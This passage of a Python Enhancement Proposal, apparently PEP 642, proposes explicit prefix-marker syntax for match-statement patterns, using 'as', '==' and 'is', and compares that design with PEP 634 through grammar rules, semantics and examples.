The original PEP 622 (which was later split into PEP 634, PEP 635, and PEP 636) +incorporated an unstated but essential assumption in its syntax design: that +neither ordinary expressions nor the existing assignment target syntax provide +an adequate foundation for the syntax used in match patterns.

+

While the PEP didn’t explicitly state this assumption, one of the PEP authors +explained it clearly on python-dev [1]:

+
+
The actual problem that I see is that we have different cultures/intuitions +fundamentally clashing here. In particular, so many programmers welcome +pattern matching as an “extended switch statement” and find it therefore +strange that names are binding and not expressions for comparison. Others +argue that it is at odds with current assignment statements, say, and +question why dotted names are _/not/_ binding. What all groups seem to +have in common, though, is that they refer to _/their/_ understanding and +interpretation of the new match statement as ‘consistent’ or ‘intuitive’ +— naturally pointing out where we as PEP authors went wrong with our +design.

But here is the catch: at least in the Python world, pattern matching as +proposed by this PEP is an unprecedented and new way of approaching a common +problem. It is not simply an extension of something already there. Even +worse: while designing the PEP we found that no matter from which angle you +approach it, you will run into issues of seeming ‘inconsistencies’ (which is +to say that pattern matching cannot be reduced to a ‘linear’ extension of +existing features in a meaningful way): there is always something that goes +fundamentally beyond what is already there in Python. That’s why I argue +that arguments based on what is ‘intuitive’ or ‘consistent’ just do not +make sense _/in this case/_.

+
+

The first iteration of this PEP was then born out of an attempt to show that the +second assertion was not accurate, and that match patterns could be treated +as a variation on assignment targets without leading to inherent contradictions. +(An earlier PR submitted to list this option in the “Rejected Ideas” section +of the original PEP 622 had previously been declined [2]).

+

However, the review process for this PEP strongly suggested that not only did +the contradictions that Tobias mentioned in his email exist, but they were also +concerning enough to cast doubts on the syntax proposal presented in PEP 634. +Accordingly, this PEP was changed to go even further than PEP 634, and largely +abandon alignment between the sequence matching syntax and the existing iterable +unpacking syntax (effectively answering “Not really, at least as far as the +exact syntax is concerned” to the first question raised in the DLS’20 paper +[9]: “Can we extend a feature like iterable unpacking to work for more general +object and data layouts?”).

+

This resulted in a complete reversal of the goals of the PEP: rather than +attempting to emphasise the similarities between assignment and pattern matching, +the PEP now attempts to make sure that assignment target syntax isn’t being +reused at all, reducing the likelihood of incorrect inferences being drawn +about the new construct based on experience with existing ones.

+

Finally, before completing the 3rd iteration of the proposal (which dropped +inferred patterns entirely), the PEP author spent quite a bit of time reflecting +on the following entries in PEP 20:

+
    +
  • Explicit is better than implicit.
  • +
  • Special cases aren’t special enough to break the rules.
  • +
  • In the face of ambiguity, refuse the temptation to guess.
  • +
+

If we start with an explicit syntax, we can always add syntactic shortcuts later +(e.g. consider the recent proposals to add shortcuts for Union and +Optional type hints only after years of experience with the original more +verbose forms), while if we start out with only the abbreviated forms, +then we don’t have any real way to revisit those decisions in a future release.

+
+
+

Specification

+

This PEP retains the overall match/case statement structure and semantics +from PEP 634, but proposes multiple changes that mean that user intent is +explicitly specified in the concrete syntax rather than needing to be inferred +from the pattern matching context.

+

In the proposed Abstract Syntax Tree, the semantics are also always explicit, +with no inference required.

+
+

The Match Statement

+

Surface syntax:

+
match_stmt: "match" subject_expr ':' NEWLINE INDENT case_block+ DEDENT
+subject_expr:
+    | star_named_expression ',' star_named_expressions?
+    | named_expression
+case_block: "case" (guarded_pattern | open_pattern) ':' block
+
+guarded_pattern: closed_pattern 'if' named_expression
+
+open_pattern:
+    | as_pattern
+    | or_pattern
+
+closed_pattern:
+    | wildcard_pattern
+    | group_pattern
+    | structural_constraint
+
+
+

Abstract syntax:

+
Match(expr subject, match_case* cases)
+match_case = (pattern pattern, expr? guard, stmt* body)
+
+
+

The rules star_named_expression, star_named_expressions, +named_expression and block are part of the standard Python +grammar.

+

Open patterns are patterns which consist of multiple tokens, and aren’t +necessarily terminated by a closing delimiter (for example, __ as x, +int() | bool()). To avoid ambiguity for human readers, their usage is +restricted to top level patterns and to group patterns (which are patterns +surrounded by parentheses).

+

Closed patterns are patterns which either consist of a single token +(i.e. __), or else have a closing delimiter as a required part of their +syntax (e.g. [as x, as y], object{.x as x, .y as y}).

+

As in PEP 634, the match and case keywords are soft keywords, i.e. they +are not reserved words in other grammatical contexts (including at the +start of a line if there is no colon where expected). This means +that they are recognized as keywords when part of a match +statement or case block only, and are allowed to be used in all +other contexts as variable or argument names.

+

Unlike PEP 634, patterns are explicitly defined as a new kind of node in the +abstract syntax tree - even when surface syntax is shared with existing +expression nodes, a distinct abstract node is emitted by the parser.

+

For context, match_stmt is a new alternative for +compound_statement in the surface syntax and Match is a new +alternative for stmt in the abstract syntax.

+
+

Match Semantics

+

This PEP largely retains the overall pattern matching semantics proposed in +PEP 634.

+

The proposed syntax for patterns changes significantly, and is discussed in +detail below.

+

There are also some proposed changes to the semantics of class defined +constraints (class patterns in PEP 634) to eliminate the need to special case +any builtin types (instead, the introduction of dedicated syntax for instance +attribute constraints allows the behaviour needed by those builtin types to be +specified as applying to any type that sets __match_args__ to None)

+
+
+

Guards

+

This PEP retains the guard clause semantics proposed in PEP 634.

+

However, the syntax is changed slightly to require that when a guard clause +is present, the case pattern must be a closed pattern.

+

This makes it clearer to the reader where the pattern ends and the guard clause +begins. (This is mainly a potential problem with OR patterns, where the guard +clause looks kind of like the start of a conditional expression in the final +pattern. Actually doing that isn’t legal syntax, so there’s no ambiguity as far +as the compiler is concerned, but the distinction may not be as clear to a human +reader)

+
+
+

Irrefutable case blocks

+

The definition of irrefutable case blocks changes slightly in this PEP relative +to PEP 634, as capture patterns no longer exist as a separate concept from +AS patterns.

+

Aside from that caveat, the handling of irrefutable cases is the same as in +PEP 634:

+
    +
  • wildcard patterns are irrefutable
  • +
  • AS patterns whose left-hand side is irrefutable
  • +
  • OR patterns containing at least one irrefutable pattern
  • +
  • parenthesized irrefutable patterns
  • +
  • a case block is considered irrefutable if it has no guard and its +pattern is irrefutable.
  • +
  • a match statement may have at most one irrefutable case block, and it +must be last.
  • +
+
+
+
+

Patterns

+

The top-level surface syntax for patterns is as follows:

+
open_pattern: # Pattern may use multiple tokens with no closing delimiter
+    | as_pattern
+    | or_pattern
+
+as_pattern: [closed_pattern] pattern_as_clause
+
+or_pattern: '|'.simple_pattern+
+
+simple_pattern: # Subnode where "as" and "or" patterns must be parenthesised
+    | closed_pattern
+    | value_constraint
+
+closed_pattern: # Require a single token or a closing delimiter in pattern
+    | wildcard_pattern
+    | group_pattern
+    | structural_constraint
+
+
+

As described above, the usage of open patterns is limited to top level case +clauses and when parenthesised in a group pattern.

+

The abstract syntax for patterns explicitly indicates which elements are +subpatterns and which elements are subexpressions or identifiers:

+
pattern = MatchAlways
+     | MatchValue(matchop op, expr value)
+     | MatchSequence(pattern* patterns)
+     | MatchMapping(expr* keys, pattern* patterns)
+     | MatchAttrs(expr cls, identifier* attrs, pattern* patterns)
+     | MatchClass(expr cls, pattern* patterns, identifier* extra_attrs, pattern* extra_patterns)
+
+     | MatchRestOfSequence(identifier? target)
+     -- A NULL entry in the MatchMapping key list handles capturing extra mapping keys
+
+     | MatchAs(pattern? pattern, identifier target)
+     | MatchOr(pattern* patterns)
+
+
+
+

AS Patterns

+

Surface syntax:

+
as_pattern: [closed_pattern] pattern_as_clause
+pattern_as_clause: 'as' pattern_capture_target
+pattern_capture_target: !"__" NAME !('.' | '(' | '=')
+
+
+

(Note: the name on the right may not be __.)

+

Abstract syntax:

+
MatchAs(pattern? pattern, identifier target)
+
+
+

An AS pattern matches the closed pattern on the left of the as +keyword against the subject. If this fails, the AS pattern fails. +Otherwise, the AS pattern binds the subject to the name on the right +of the as keyword and succeeds.

+

If no pattern to match is given, the wildcard pattern (__) is implied.

+

To avoid confusion with the wildcard pattern, the double underscore (__) +is not permitted as a capture target (this is what !"__" expresses).

+

A capture pattern always succeeds. It binds the subject value to the +name using the scoping rules for name binding established for named expressions +in PEP 572. (Summary: the name becomes a local +variable in the closest containing function scope unless there’s an +applicable nonlocal or global statement.)

+

In a given pattern, a given name may be bound only once. This +disallows for example case [as x, as x]: ... but allows +case [as x] | (as x):

+

As an open pattern, the usage of AS patterns is limited to top level case +clauses and when parenthesised in a group pattern. However, several of the +structural constraints allow the use of pattern_as_clause in relevant +locations to bind extracted elements of the matched subject to local variables. +These are mostly represented in the abstract syntax tree as MatchAs nodes, +aside from the dedicated MatchRestOfSequence node in sequence patterns.

+
+
+

OR Patterns

+

Surface syntax:

+
or_pattern: '|'.simple_pattern+
+
+simple_pattern: # Subnode where "as" and "or" patterns must be parenthesised
+    | closed_pattern
+    | value_constraint
+
+
+

Abstract syntax:

+
MatchOr(pattern* patterns)
+
+
+

When two or more patterns are separated by vertical bars (|), +this is called an OR pattern. (A single simple pattern is just that)

+

Only the final subpattern may be irrefutable.

+

Each subpattern must bind the same set of names.

+

An OR pattern matches each of its subpatterns in turn to the subject, +until one succeeds. The OR pattern is then deemed to succeed. +If none of the subpatterns succeed the OR pattern fails.

+

Subpatterns are mostly required to be closed patterns, but the parentheses may +be omitted for value constraints.

+
+
+

Value constraints

+

Surface syntax:

+
value_constraint:
+    | eq_constraint
+    | id_constraint
+
+eq_constraint: '==' closed_expr
+id_constraint: 'is' closed_expr
+
+closed_expr: # Require a single token or a closing delimiter in expression
+    | primary
+    | closed_factor
+
+closed_factor: # "factor" is the main grammar node for these unary ops
+    | '+' primary
+    | '-' primary
+    | '~' primary
+
+
+

Abstract syntax:

+
MatchValue(matchop op, expr value)
+matchop = EqCheck | IdCheck
+
+
+

The rule primary is defined in the standard Python grammar, and only +allows expressions that either consist of a single token, or else are required +to end with a closing delimiter.

+

Value constraints replace PEP 634’s literal patterns and value patterns.

+

Equality constraints are written as == EXPR, while identity constraints are +written as is EXPR.

+

An equality constraint succeeds if the subject value compares equal to the +value given on the right, while an identity constraint succeeds only if they are +the exact same object.

+

The expressions to be compared against are largely restricted to either +single tokens (e.g. names, strings, numbers, builtin constants), or else to +expressions that are required to end with a closing delimiter.

+

The use of the high precedence unary operators is also permitted, as the risk of +perceived ambiguity is low, and being able to specify negative numbers without +parentheses is desirable.

+

When the same constraint expression occurs multiple times in the same match +statement, the interpreter may cache the first value calculated and reuse it, +rather than repeat the expression evaluation. (As for PEP 634 value patterns, +this cache is strictly tied to a given execution of a given match statement.)

+

Unlike literal patterns in PEP 634, this PEP requires that complex +literals be parenthesised to be accepted by the parser. See the Deferred +Ideas section for discussion on that point.

+

If this PEP were to be adopted in preference to PEP 634, then all literal and +value patterns would instead be written more explicitly as value constraints:

+
# Literal patterns
+match number:
+    case == 0:
+        print("Nothing")
+    case == 1:
+        print("Just one")
+    case == 2:
+        print("A couple")
+    case == -1:
+        print("One less than nothing")
+    case == (1-1j):
+        print("Good luck with that...")
+
+# Additional literal patterns
+match value:
+    case == True:
+        print("True or 1")
+    case == False:
+        print("False or 0")
+    case == None:
+        print("None")
+    case == "Hello":
+        print("Text 'Hello'")
+    case == b"World!":
+        print("Binary 'World!'")
+
+# Matching by identity rather than equality
+SENTINEL = object()
+match value:
+    case is True:
+        print("True, not 1")
+    case is False:
+        print("False, not 0")
+    case is None:
+        print("None, following PEP 8 comparison guidelines")
+    case is ...:
+        print("May be useful when writing __getitem__ methods?")
+    case is SENTINEL:
+        print("Matches the sentinel by identity, not just value")
+
+# Matching against variables and attributes
+from enum import Enum
+class Sides(str, Enum):
+    SPAM = "Spam"
+    EGGS = "eggs"
+    ...
+
+preferred_side = Sides.EGGS
+match entree[-1]:
+    case == Sides.SPAM:  # Compares entree[-1] == Sides.SPAM.
+        response = "Have you got anything without Spam?"
+    case == preferred_side:  # Compares entree[-1] == preferred_side
+        response = f"Oh, I love {preferred_side}!"
+    case as side:  # Assigns side = entree[-1].
+        response = f"Well, could I have their Spam instead of the {side} then?"
+
+
+

Note the == preferred_side example: using an explicit prefix marker on +constraint expressions removes the restriction to only working with attributes +or literals for value lookups.

+

The == (1-1j) example illustrates the use of parentheses to turn any +subexpression into a closed one.

+
+
+

Wildcard Pattern

+

Surface syntax:

+
wildcard_pattern: "__"
+
+
+

Abstract syntax:

+
MatchAlways
+
+
+

A wildcard pattern always succeeds. As in PEP 634, it binds no name.

+

Where PEP 634 chooses the single underscore as its wildcard pattern for +consistency with other languages, this PEP chooses the double underscore as that +has a clearer path towards potentially being made consistent across the entire +language, whereas that path is blocked for "_" by i18n related use cases.

+

Example usage:

+
match sequence:
+    case [__]:               # any sequence with a single element
+        return True
+    case [start, *__, end]:  # a sequence with at least two elements
+        return start == end
+    case __:                 # anything
+        return False
+
+
+
+
+

Group Patterns

+

Surface syntax:

+
group_pattern: '(' open_pattern ')'
+
+
+

For the syntax of open_pattern, see Patterns above.

+

A parenthesized pattern has no additional syntax and is not represented in the +abstract syntax tree. It allows users to add parentheses around patterns to +emphasize the intended grouping, and to allow nesting of open patterns when the +grammar requires a closed pattern.

+

Unlike PEP 634, there is no potential ambiguity with sequence patterns, as +this PEP requires that all sequence patterns be written with square brackets.

+
+
+

Structural constraints

+

Surface syntax:

+
structural_constraint:
+    | sequence_constraint
+    | mapping_constraint
+    | attrs_constraint
+    | class_constraint
+
+
+

Note: the separate “structural constraint” subcategory isn’t used in the +abstract syntax tree; it’s merely a convenient grouping node in the +surface syntax definition.

+

Structural constraints are patterns used to both make assertions about complex +objects and to extract values from them.

+

These patterns may all bind multiple values, either through the use of nested +AS patterns, or else through the use of pattern_as_clause elements included +in the definition of the pattern.

+
+
+

Sequence constraints

+

Surface syntax:

+
sequence_constraint: '[' [sequence_constraint_elements] ']'
+sequence_constraint_elements: ','.sequence_constraint_element+ ','?
+sequence_constraint_element:
+    | star_pattern
+    | simple_pattern
+    | pattern_as_clause
+star_pattern: '*' (pattern_as_clause | wildcard_pattern)
+
+simple_pattern: # Subnode where "as" and "or" patterns must be parenthesised
+    | closed_pattern
+    | value_constraint
+
+pattern_as_clause: 'as' pattern_capture_target
+
+
+

Abstract syntax:

+
MatchSequence(pattern* patterns)
+
+MatchRestOfSequence(identifier? target)
+
+
+

Sequence constraints allow items within a sequence to be checked and +optionally extracted.

+

A sequence pattern fails if the subject value is not an instance of +collections.abc.Sequence. It also fails if the subject value is +an instance of str, bytes or bytearray (see Deferred Ideas for +a discussion on potentially removing the need for this special casing).

+

A sequence pattern may contain at most one star subpattern. The star +subpattern may occur in any position and is represented in the AST using the +MatchRestOfSequence node.

+

If no star subpattern is present, the sequence pattern is a fixed-length +sequence pattern; otherwise it is a variable-length sequence pattern.

+

A fixed-length sequence pattern fails if the length of the subject +sequence is not equal to the number of subpatterns.

+

A variable-length sequence pattern fails if the length of the subject +sequence is less than the number of non-star subpatterns.

+

The length of the subject sequence is obtained using the builtin +len() function (i.e., via the __len__ protocol). However, the +interpreter may cache this value in a similar manner as described for +value constraint expressions.

+

A fixed-length sequence pattern matches the subpatterns to +corresponding items of the subject sequence, from left to right. +Matching stops (with a failure) as soon as a subpattern fails. If all +subpatterns succeed in matching their corresponding item, the sequence +pattern succeeds.

+

A variable-length sequence pattern first matches the leading non-star +subpatterns to the corresponding items of the subject sequence, as for +a fixed-length sequence. If this succeeds, the star subpattern +matches a list formed of the remaining subject items, with items +removed from the end corresponding to the non-star subpatterns +following the star subpattern. The remaining non-star subpatterns are +then matched to the corresponding subject items, as for a fixed-length +sequence.

+

Subpatterns are mostly required to be closed patterns, but the parentheses may +be omitted for value constraints. Sequence elements may also be captured +unconditionally without parentheses.

+

Note: where PEP 634 allows all the same syntactic flexibility as iterable +unpacking in assignment statements, this PEP restricts sequence patterns +specifically to the square bracket form. Given that the open and parenthesised +forms are far more popular than square brackets for iterable unpacking, this +helps emphasise that iterable unpacking and sequence matching are not the +same operation. It also avoids the parenthesised form’s ambiguity problem +between single element sequence patterns and group patterns.

+
+
+

Mapping constraints

+

Surface syntax:

+
mapping_constraint: '{' [mapping_constraint_elements] '}'
+mapping_constraint_elements: ','.key_value_constraint+ ','?
+key_value_constraint:
+    | closed_expr pattern_as_clause
+    | closed_expr ':' simple_pattern
+    | double_star_capture
+double_star_capture: '**' pattern_as_clause
+
+
+

(Note that **__ is deliberately disallowed by this syntax, as additional +mapping entries are ignored by default)

+

closed_expr is defined above, under value constraints.

+

Abstract syntax:

+
MatchMapping(expr* keys, pattern* patterns)
+
+
+

Mapping constraints allow keys and values within a mapping to be checked and +values to optionally be extracted.

+

A mapping pattern fails if the subject value is not an instance of +collections.abc.Mapping.

+

A mapping pattern succeeds if every key given in the mapping pattern +is present in the subject mapping, and the pattern for +each key matches the corresponding item of the subject mapping.

+

The presence of keys is checked using the two argument form of the get +method and a unique sentinel value, which offers the following benefits:

+
    +
  • no exceptions need to be created in the lookup process
  • +
  • mappings that implement __missing__ (such as collections.defaultdict) +only match on keys that they already contain, they don’t implicitly add keys
  • +
+
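A minimal sketch of that sentinel-based lookup (the helper is illustrative, not part of the specification):

_SENTINEL = object()

def lookup_mapping_key(subject, key):
    value = subject.get(key, _SENTINEL)
    if value is _SENTINEL:
        return None, False  # key absent: the mapping pattern fails
    # No KeyError was raised, and .get() never triggers __missing__,
    # so e.g. a defaultdict is not mutated by the check.
    return value, True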

A mapping pattern may not contain duplicate key values. If duplicate keys are +detected when checking the mapping pattern, the pattern is considered invalid, +and a ValueError is raised. While it would theoretically be possible to +check for duplicated constant keys at compile time, no such check is currently +defined or implemented.

+

(Note: This semantic description is derived from the PEP 634 reference +implementation, which differs from the PEP 634 specification text at time of +writing. The implementation seems reasonable, so amending the PEP text seems +like the best way to resolve the discrepancy)

+

If a '**' as NAME double star pattern is present, that name is bound to a +dict containing any remaining key-value pairs from the subject mapping +(the dict will be empty if there are no additional key-value pairs).

+

A mapping pattern may contain at most one double star pattern, +and it must be last.

+

Value subpatterns are mostly required to be closed patterns, but the parentheses +may be omitted for value constraints (the : key/value separator is still +required to ensure the entry doesn’t look like an ordinary comparison operation).

+

Mapping values may also be captured unconditionally using the KEY as NAME +form, without either parentheses or the : key/value separator.

+
+
+

Instance attribute constraints

+

Surface syntax:

+
attrs_constraint:
+    | name_or_attr '{' [attrs_constraint_elements] '}'
+attrs_constraint_elements: ','.attr_value_pattern+ ','?
+attr_value_pattern:
+    | '.' NAME pattern_as_clause
+    | '.' NAME value_constraint
+    | '.' NAME ':' simple_pattern
+    | '.' NAME
+
+
+

Abstract syntax:

+
MatchAttrs(expr cls, identifier* attrs, pattern* patterns)
+
+
+

Instance attribute constraints allow an instance’s type to be checked and +attributes to optionally be extracted.

+

An instance attribute constraint may not repeat the same attribute name multiple +times. Attempting to do so will result in a syntax error.

+

An instance attribute pattern fails if the subject is not an instance of +name_or_attr. This is tested using isinstance().

+

If name_or_attr is not an instance of the builtin type, +TypeError is raised.

+

If no attribute subpatterns are present, the constraint succeeds if the +isinstance() check succeeds. Otherwise:

+
+
    +
  • Each given attribute name is looked up as an attribute on the subject.
      +
    • If this raises an exception other than AttributeError, +the exception bubbles up.
    • +
    • If this raises AttributeError the constraint fails.
    • +
    • Otherwise, the subpattern associated with the keyword is matched +against the attribute value. If no subpattern is specified, the wildcard +pattern is assumed. If this fails, the constraint fails. +If it succeeds, the match proceeds to the next attribute.
    • +
    +
  • +
  • If all attribute subpatterns succeed, the constraint as a whole succeeds.
  • +
+
+
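A rough sketch of the per-attribute step described in the list above (illustrative only):

def match_attribute(subject, name):
    try:
        value = getattr(subject, name)
    except AttributeError:
        return None, False  # the constraint fails
    # Any other exception deliberately bubbles up unchanged. On success,
    # the caller matches the associated subpattern (or the wildcard
    # pattern, if none was given) against the returned value.
    return value, True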

Instance attribute constraints allow ducktyping checks to be implemented by +using object as the required instance type (e.g. +case object{.host as host, .port as port}:).

+

The syntax being proposed here could potentially also be used as the basis for +a new syntax for retrieving multiple attributes from an object instance in one +assignment statement (e.g. host, port = addr{.host, .port}). See the +Deferred Ideas section for further discussion of this point.

+
+
+

Class defined constraints

+

Surface syntax:

+
class_constraint:
+    | name_or_attr '(' ')'
+    | name_or_attr '(' positional_patterns ','? ')'
+    | name_or_attr '(' class_constraint_attrs ')'
+    | name_or_attr '(' positional_patterns ',' class_constraint_attrs ')'
+positional_patterns: ','.positional_pattern+
+positional_pattern:
+    | simple_pattern
+    | pattern_as_clause
+class_constraint_attrs:
+    | '**' '{' [attrs_constraint_elements] '}'
+
+
+

Abstract syntax:

+
MatchClass(expr cls, pattern* patterns, identifier* extra_attrs, pattern* extra_patterns)
+
+
+

Class defined constraints allow a sequence of common attributes to be +specified on a class and checked positionally, rather than needing to specify +the attribute names in every related match pattern.

+

As for instance attribute patterns:

+
    +
  • a class defined pattern fails if the subject is not an instance of +name_or_attr. This is tested using isinstance().
  • +
  • if name_or_attr is not an instance of the builtin type, +TypeError is raised.
  • +
+

Regardless of whether or not any arguments are present, the class is checked +for a __match_args__ attribute using the equivalent of +getattr(cls, "__match_args__", _SENTINEL).

+

If this raises an exception the exception bubbles up.

+

If the returned value is not a list, tuple, or None, the conversion fails +and TypeError is raised at runtime.

+

This means that only types that actually define __match_args__ will be +usable in class defined patterns. Types that don’t define __match_args__ +will still be usable in instance attribute patterns.

+

If __match_args__ is None, then only a single positional subpattern is +permitted. Attempting to specify additional attribute patterns either +positionally or using the double star syntax will cause TypeError to be +raised at runtime.

+

This positional subpattern is then matched against the entire subject, allowing +a type check to be combined with another match pattern (e.g. checking both +the type and contents of a container, or the type and value of a number).

+

If __match_args__ is a list or tuple, then the class defined constraint is +converted to an instance attributes constraint as follows:

+
    +
  • if only the double star attribute constraints subpattern is present, matching +proceeds as if for the equivalent instance attributes constraint.
  • +
  • if there are more positional subpatterns than the length of +__match_args__ (as obtained using len()), TypeError is raised.
  • +
  • Otherwise, positional pattern i is converted to an attribute pattern +using __match_args__[i] as the attribute name.
  • +
  • if any element in __match_args__ is not a string, TypeError is raised.
  • +
  • once the positional patterns have been converted to attribute patterns, then +they are combined with any attribute constraints given in the double star +attribute constraints subpattern, and matching proceeds as if for the +equivalent instance attributes constraint.
  • +
+

Note: the __match_args__ is None handling in this PEP replaces the special +casing of bool, bytearray, bytes, dict, float, +frozenset, int, list, set, str, and tuple in PEP 634. +However, the optimised fast path for those types is retained in the +implementation.

+
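A rough, non-normative sketch of the conversion rules described above (names and error messages are illustrative):

_SENTINEL = object()

def positional_to_attr_names(cls, num_positional):
    match_args = getattr(cls, "__match_args__", _SENTINEL)
    if match_args is _SENTINEL:
        raise TypeError("type does not support class defined patterns")
    if match_args is None:
        # Double star attribute constraints are also disallowed here.
        if num_positional != 1:
            raise TypeError("only a single positional subpattern is allowed")
        return None  # the one subpattern is matched against the whole subject
    if not isinstance(match_args, (list, tuple)):
        raise TypeError("__match_args__ must be a list, tuple, or None")
    if any(not isinstance(name, str) for name in match_args):
        raise TypeError("__match_args__ elements must be strings")
    if num_positional > len(match_args):
        raise TypeError("too many positional subpatterns")
    # Positional pattern i is then treated as an attribute pattern on
    # the returned names[i], as for an instance attributes constraint.
    return list(match_args[:num_positional])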
+
+
+
+

Design Discussion

+
+

Requiring explicit qualification of simple names in match patterns

+

The first iteration of this PEP accepted the basic premise of PEP 634 that +iterable unpacking syntax would provide a good foundation for defining a new +syntax for pattern matching.

+

During the review process, however, two major and one minor ambiguity problems +were highlighted that arise directly from that core assumption:

+
    +
  • most problematically, when binding simple names by default is extended to +PEP 634’s proposed class pattern syntax, the ATTR=TARGET_NAME construct +binds to the right without using the as keyword, and uses the normal +assignment-to-the-left sigil (=) to do it!
  • +
  • when binding simple names by default is extended to PEP 634’s proposed mapping +pattern syntax, the KEY: TARGET_NAME construct binds to the right without +using the as keyword
  • +
  • using a PEP 634 capture pattern together with an AS pattern +(TARGET_NAME_1 as TARGET_NAME_2) gives an odd “binds to both the left and +right” behaviour
  • +
+

The third revision of this PEP accounted for this problem by abandoning the +alignment with iterable unpacking syntax, and instead requiring that all uses +of bare simple names for anything other than a variable lookup be qualified by +a preceding sigil or keyword:

+
    +
  • as NAME: local variable binding
  • +
  • .NAME: attribute lookup
  • +
  • == NAME: variable lookup
  • +
  • is NAME: variable lookup
  • +
  • any other usage: variable lookup
  • +
+
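For example, under this rule every simple name in the following sketch carries an explicit marker for its role:

+
match subject:
+    case == EXPECTED:             # "== NAME": equality check against a looked-up value
+        ...
+    case object{.attr as value}:  # ".NAME": attribute lookup on the subject
+        ...
+    case as captured:             # "as NAME": binds the entire subject
+        ...
+
+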

The key benefit of this approach is that it makes interpretation of simple names +in patterns a local activity: a leading as indicates a name binding, a +leading . indicates an attribute lookup, and anything else is a variable +lookup (regardless of whether we’re reading a subpattern or a subexpression).

+

With the syntax now proposed in this PEP, the problematic cases identified above +no longer read poorly:

+
    +
  • .ATTR as TARGET_NAME is more obviously a binding than ATTR=TARGET_NAME
  • +
  • KEY as TARGET_NAME is more obviously a binding than KEY: TARGET_NAME
  • +
  • (as TARGET_NAME_1) as TARGET_NAME_2 is more obviously two bindings than +TARGET_NAME_1 as TARGET_NAME_2
  • +
+
+
+

Resisting the temptation to guess

+

PEP 635 looks at the way pattern matching is used in other languages, and +attempts to use that information to make plausible predictions about the way +pattern matching will be used in Python:

+
    +
  • wanting to extract values to local names will probably be more common than +wanting to match against values stored in local names
  • +
  • wanting comparison by equality will probably be more common than wanting +comparison by identity
  • +
  • users will probably be able to at least remember that bare names bind values +and attribute references look up values, even if they can’t figure that out +for themselves without reading the documentation or having someone tell them
  • +
+

To be clear, I think these predictions actually are plausible. However, I also +don’t think we need to guess about this up front: I think we can start out with +a more explicit syntax that requires users to state their intent using a prefix +marker (either as, ==, or is), and then reassess the situation in a +few years based on how pattern matching is actually being used in Python.

+

At that point, we’ll be able to choose amongst at least the following options:

+
    +
  • deciding the explicit syntax is concise enough, and not changing anything
  • +
  • adding inferred identity constraints for one or more of None, ..., +True and False
  • +
  • adding inferred equality constraints for other literals (potentially including +complex literals)
  • +
  • adding inferred equality constraints for attribute lookups
  • +
  • adding either inferred equality constraints or inferred capture patterns for +bare names
  • +
+

All of those ideas could be considered independently on their own merits, rather +than being a potential barrier to introducing pattern matching in the first +place.

+

If any of these syntactic shortcuts were to eventually be introduced, they’d also be straightforward to explain in terms of the underlying more explicit syntax (the leading as, ==, or is would just be getting inferred by the parser, without the user needing to provide it explicitly). At the implementation level, only the parser should need to change, as the existing AST nodes could be reused.

+
+
+

Interaction with caching of attribute lookups in local variables

+

One of the major changes between this PEP and PEP 634 is to use == EXPR +for equality constraint lookups, rather than only offering NAME.ATTR. The +original motivation for this was to avoid the semantic conflict with regular +assignment targets, where NAME.ATTR is already used in assignment statements +to set attributes, so if NAME.ATTR were the only syntax for symbolic value +matching, then we’re pre-emptively ruling out any future attempts to allow +matching against single patterns using the existing assignment statement syntax. +The current motivation is more about the general desire to avoid guessing about +user’s intent, and instead requiring them to state it explicitly in the syntax.

+

However, even within match statements themselves, the name.attr syntax for +value patterns has an undesirable interaction with local variable assignment, +where routine refactorings that would be semantically neutral for any other +Python statement introduce a major semantic change when applied to a PEP 634 +style match statement.

+

Consider the following code:

+
while value < self.limit:
+    ... # Some code that adjusts "value"
+
+
+

The attribute lookup can be safely lifted out of the loop and only performed +once:

+
_limit = self.limit
+while value < _limit:
+    ... # Some code that adjusts "value"
+
+
+

With the marker prefix based syntax proposal in this PEP, value constraints +would be similarly tolerant of match patterns being refactored to use a local +variable instead of an attribute lookup, with the following two statements +being functionally equivalent:

+
match expr:
+    case {"key": == self.target}:
+        ... # Handle the case where 'expr["key"] == self.target'
+    case __:
+        ... # Handle the non-matching case
+
+_target = self.target
+match expr:
+    case {"key": == _target}:
+        ... # Handle the case where 'expr["key"] == self.target'
+    case __:
+        ... # Handle the non-matching case
+
+
+

By contrast, when using PEP 634’s value and capture pattern syntaxes that omit +the marker prefix, the following two statements wouldn’t be equivalent at all:

+
# PEP 634's value pattern syntax
+match expr:
+    case {"key": self.target}:
+        ... # Handle the case where 'expr["key"] == self.target'
+    case _:
+        ... # Handle the non-matching case
+
+# PEP 634's capture pattern syntax
+_target = self.target
+match expr:
+    case {"key": _target}:
+        ... # Matches any mapping with "key", binding its value to _target
+    case _:
+        ... # Handle the non-matching case
+
+
+

This PEP ensures the original semantics are retained under this style of +simplistic refactoring: use == name to force interpretation of the result +as a value constraint, use as name for a name binding.

+

PEP 634’s proposal to offer only the shorthand syntax, with no explicitly +prefixed form, means that the primary answer on offer is “Well, don’t do that, +then, only compare against attributes in namespaces, don’t compare against +simple names”.

+

PEP 622’s walrus pattern syntax had another odd interaction where it might not +bind the same object as the exact same walrus expression in the body of the +case clause, but PEP 634 fixed that discrepancy by replacing walrus patterns +with AS patterns (where the fact that the value bound to the name on the RHS +might not be the same value as returned by the LHS is a standard feature common +to all uses of the “as” keyword).

+
+
+

Using existing comparison operators as the value constraint prefix

+

If the benefit of a dedicated value constraint prefix is accepted, then the +next question is to ask exactly what that prefix should be.

+

The initially published version of this PEP proposed using the previously +unused ? symbol as the prefix for equality constraints, and ?is as the +prefix for identity constraints. When reviewing the PEP, Steven D’Aprano +presented a compelling counterproposal [5] to use the existing comparison +operators (== and is) instead.

+

There were a few concerns with == as a prefix that kept it from being +chosen as the prefix in the initial iteration of the PEP:

+
    +
  • for common use cases, it’s even more visually noisy than ?, as a lot of +folks with PEP 8 trained aesthetic sensibilities are going to want to put +a space between it and the following expression, effectively making it a 3 +character prefix instead of 1
  • +
  • when used in a mapping pattern, there needs to be a space between the : +key/value separator and the == prefix, or the tokeniser will split them +up incorrectly (getting := and = instead of : and ==)
  • +
  • when used in an OR pattern, there needs to be a space between the | +pattern separator and the == prefix, or the tokeniser will split them +up incorrectly (getting |= and = instead of | and ==)
  • +
  • if used in a PEP 634 style class pattern, there needs to be a space between +the = keyword separator and the == prefix, or the tokeniser will split +them up incorrectly (getting == and = instead of = and ==)
  • +
+
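The mapping pattern case illustrates the tokenisation problem (illustrative only):

+
# Without the space, ":==" is tokenised as ":=" followed by "=":
+case {"key":== 0}:   # seen as {"key" := = 0} -> syntax error
+case {"key": == 0}:  # tokenised correctly as ":" then "=="
+
+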

